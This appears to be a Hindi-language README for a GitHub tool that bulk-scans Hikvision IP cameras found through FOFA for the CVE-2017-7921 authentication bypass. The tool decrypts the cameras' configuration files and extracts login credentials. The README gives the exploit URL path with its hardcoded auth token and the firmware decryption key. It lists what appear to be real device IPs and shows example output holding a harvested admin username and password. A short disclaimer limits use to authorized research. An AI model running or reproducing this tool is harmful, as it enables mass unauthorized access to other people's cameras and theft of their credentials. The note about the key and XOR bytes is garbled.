
FOFA की सहायता से Hikvision के CVE-2017-7921 भेद्यता का तेज़ी से परीक्षण करने के लिए उपयोग किया जाता है, तथा लॉगिन खाता और पासवर्ड प्रदान करता है और json फ़ाइल आउटपुट करता है।
सुरक्षा घोषणा: यह टूल केवल अधिकृत सुरक्षा अनुसंधान और भेद्यता सत्यापन के लिए है
महत्वपूर्ण सूचना: इस टूल का उपयोग करने का अर्थ है कि आप निम्नलिखित शर्तों से सहमत हैं
यह परियोजना GitHub सुरक्षा अनुसंधान नीति और Hikvision सुरक्षा प्रतिक्रिया केंद्र के प्रकटीकरण मानदंडों का पालन करती है।
Hikvision IP कैमरों में CVE-2017-7921 प्रमाणीकरण बायपास भेद्यता के लिए बल्क डिटेक्शन और सत्यापन टूल, जो कॉन्फ़िगरेशन फ़ाइलों के स्वचालित डिक्रिप्शन और क्रेडेंशियल निष्कर्षण का समर्थन करता है।
git clone https://github.com/[你的用户名]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
टूल निर्देशिका में zc/ फ़ोल्डर बनाएं, डिवाइस सूची को JSON प्रारूप में रखें (प्रत्येक पंक्ति में एक डिवाइस ऑब्जेक्ट):
mkdir zc
फ़ाइल उदाहरण: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
फ़ील्ड विवरण:
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
Hikvision कैमरा कॉन्फ़िगरेशन फ़ाइल भेद्यता बल्क स्कैन टूल
════════════════════════════════════════════════════════════════════════════════
उपलब्ध JSON फ़ाइलें:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 बाइट्स)
════════════════════════════════════════════════════════════════════════════════
कृपया फ़ाइल नंबर चुनें: 1
चयनित फ़ाइल: devices_2025.json
डिवाइस डेटा लोड हो रहा है...
स्कैन किए जाने वाले कुल डिवाइस: 2000
कृपया समवर्ती थ्रेड गणना दर्ज करें (डिफ़ॉल्ट: 5): 10
समवर्ती थ्रेड गणना: 10
स्कैन प्रारंभ...
कुल स्कैन किए गए डिवाइस: 2000
भेद्य डिवाइसों की संख्या मिली: 127
भेद्य डिवाइस सहेजे गए: vulnerable_devices.json
स्कैन पूर्ण होने पर vulnerable_devices.json उत्पन्न होता है, जिसमें सभी भेद्य डिवाइसों की जानकारी होती है।
उदाहरण आउटपुट:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK हार्डकोडेड क्रेडेंशियल का उपयोग करता है279977f62f6cfd2d91cd75b889ce0c9a फर्मवेयर में हार्डकोडेड है0x73, 0x8B, 0x55, 0x44)यह सॉफ़्टवेयर केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। उपयोगकर्ताओं को यह सुनिश्चित करना चाहिए कि वे सभी लागू कानूनों का अनुपालन करते हैं।
अंतिम अपडेट: 2025-01-29 | संस्करण: v1.0.0 | समर्थित CVE: CVE-2017-7921
| फ़ील्ड | विवरण | आवश्यक |
|---|
link | डिवाइस HTTP/HTTPS एक्सेस पता | ✅ हाँ |
city | शहर की जानकारी | ❌ नहीं |
country | देश कोड | ❌ नहीं |
org | संगठन/ISP जानकारी | ❌ नहीं |